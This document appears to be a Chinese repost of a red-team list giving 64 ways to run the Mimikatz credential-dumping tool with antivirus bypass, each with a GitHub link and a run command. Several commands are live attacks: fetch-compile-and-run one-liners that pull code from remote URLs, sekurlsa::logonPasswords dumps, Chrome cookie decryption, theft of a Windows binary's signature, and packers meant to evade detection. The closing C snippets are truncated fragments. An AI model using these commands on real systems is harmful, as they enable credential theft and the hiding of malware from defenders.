64种运行mimikatz的方法(含Bypass)
From:https://redteamrecipe.com/64-Methods-For-Execute-Mimikatz/
里面包含一些免杀的方法,在实际情况中按需选择。
go-mimikatz
go build
https://github.com/vyrus001/go-mimikatz
Rusty Mimikatz
cargo build --release
https://github.com/memN0ps/mimikatz-rs
MimikatzFUD
.\Invoke-M1m1fud2.ps1
https://github.com/HernanRodriguez1/MimikatzFUD
pypykatz
pip install -r requirements.txt
https://github.com/skelsec/pypykatz
BetterSafetyKatz
.\BetterSafetyKatz.exe --DumpCreds
https://github.com/Flangvik/BetterSafetyKatz
CopyCat
.\CopyCat.exe --dump --local
https://github.com/mobdk/CopyCat
PyFuscation
python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1
https://github.com/CBHue/PyFuscation
Invoke-Cats
Invoke-Cats -pwds
https://github.com/DanMcInerney/Invoke-Cats
WinBoost
csc.exe /platform:x64 /target:exe /unsafe winboost.cs
https://github.com/mobdk/WinBoost
mimidogz
.\Invoke-Mimidogz.ps1
https://github.com/fir3d0g/mimidogz
CoreClass
"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.
https://github.com/mobdk/CoreClass
SharpMimikatz
SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
https://github.com/XTeam-Wing/SharpMimikatz
Invoke-Obfuscation
Set-ExecutionPolicy Unrestricted
https://github.com/danielbohannon/Invoke-Obfuscation
SimpleMimikatzObfuscator
Commands.txt
https://github.com/DimopoulosElias/SimpleMimikatzObfuscator
ClickOnceKatz
pip install pycryptodome requests
https://github.com/sinmygit/ClickOnceKatz
pymemimporter
import base64
https://github.com/n1nj4sec/pymemimporter
SharpDPAPI
dotnet run --project .\SharpDPAPI\SharpDPAPI.csproj
https://github.com/GhostPack/SharpDPAPI
Plog
privilege::debug
https://github.com/GamehunterKaan/Plog
StegoKatz
.\StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>
https://github.com/r13mann/StegoKatz
LoadMimikatzWithDinvoke.cs
mimi.bat
https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs
mimikatz-bypass
Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1
https://github.com/corneacristian/mimikatz-bypass
Utils
dotnet build -r win10-x64
https://github.com/ITh4cker/Utils
Eyeworm
python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE>
https://github.com/imsellbaox/Eyeworm
drunkenkatz
beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"
https://github.com/ap3r/drunkenkatz
CallBack
python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>
https://github.com/mobdk/CallBack
mimikatz-byPass-Huorong
python mimikatz_byPass_Huorong.py
https://github.com/q1ya/mimikatz-byPass-Huorong
mimikatz_bypass
python mimikatz_bypass.py
https://github.com/wangfly-me/mimikatz\_bypass
HTML-mimikatz-
cmd.exe mimikatz.html
https://github.com/vipserver/HTML-mimikatz-
Mimikatz.exe-in-JS
cmd.exe mimikatz.js
https://github.com/hardw00t/Mimikatz.exe-in-JS
-Have-You-Seen-These-Katz-
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1
https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-
MimiRunner
rundll32 *.log,#1
https://github.com/mobdk/MimiRunner
Mimikatz-PE-Injection
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*
https://github.com/analyticsearch/Mimikatz-PE-Injection
ninifox
.\Invoke-NiNifox.ps1
https://github.com/scottjosh/ninifox
Chexport
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect`
https://github.com/GamehunterKaan/Chexport
mimik
mimikatz.exe
https://github.com/MisterLobster22/mimik
my-obfuscated-mimikatz
eric.ps1
https://github.com/lazaars/my-obfuscated-mimikatz
Invoke-Mimikatz-W10
.\Invoke-Mimikatz.ps1
https://github.com/VDA-Labs/Invoke-Mimikatz-W10
MimiVader
python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py
https://github.com/lawja/MimiVader
Invoke-Mimikatz
.\Invoke-Mimikatz
https://github.com/syn-ack-zack/Invoke-Mimikatz
Invoke-Mimikatz
.\invokemimikatz.ps1
https://github.com/dfirdeferred/Invoke-Mimikatz
mimikatz_bypass
.\XInvoke-Mimikatz.ps1
https://github.com/izj007/mimikatz\_bypass
JS_MimiKatzDropper
cscript.exe dropper.js
https://github.com/leinn32/JS\_MimiKatzDropper
mimicats
Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1') Invoke-Cats -Command '"privilege::debug"'
https://github.com/Moon1705/mimicats
XorPacker
python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED
https://github.com/tmenochet/XorPacker
PEzor
PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'
AtomPePacker
PePacker.exe mimikatz.exe -e
https://github.com/NUL0x4C/AtomPePacker
Nim-RunPE
nim c -d:args NimRunPE.nim
https://github.com/S3cur3Th1sSh1t/Nim-RunPE
Nimcrypt2
nim c -d:release nimcrypt2.nim
https://github.com/icyguider/Nimcrypt2
ProtectMyTooling
py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe
https://github.com/mgeeky/ProtectMyTooling
xencrypt
Import-Module ./xencrypt.ps1
https://github.com/the-xentropy/xencrypt
BetterXencrypt
Import-Module ./betterxencrypt.ps1
https://github.com/GetRektBoy724/BetterXencrypt
AES-Encoder
Invoke-AES-Encoder -InFile
https://github.com/Chainski/AES-Encoder
mortar
./encryptor -f mimikatz.exe -o bin.enc
https://github.com/0xsp-SRD/mortar
.NET-Crypter
Browse Executable:
https://github.com/roast247/.NET-Crypter
Custom mods + Invoke-Obfuscation
sed
https://github.com/newlog/fud\_mimikatz\_talk
Obfuscated_Invoke-Mimikatz
sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1
https://github.com/VraiHack/Obfuscated\_Invoke-Mimikatz
mimikatz_encoded
certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit
https://github.com/mobx26/mimikatz\_encoded
Encrypted_Mimikatz
.\decrypt.ps1
https://github.com/Sombody101/Encrypted\_Mimikatz
SigThief
sigthief.py -i c: \Windows\System32\consent.exe -t mimikatz. exe -o MSCredentialTool.exe
https://github.com/secretsquirrel/SigThief
memory+suspended
#include <stdio.h>
XOR’d with 0xFF
#include <iostream>
XORing each character with the value 0xAA
#include <stdio.h>
Decoding and storing it in memory
#include <iostream>
Inject and execute Mimikatz in memory
#include <windows.h>
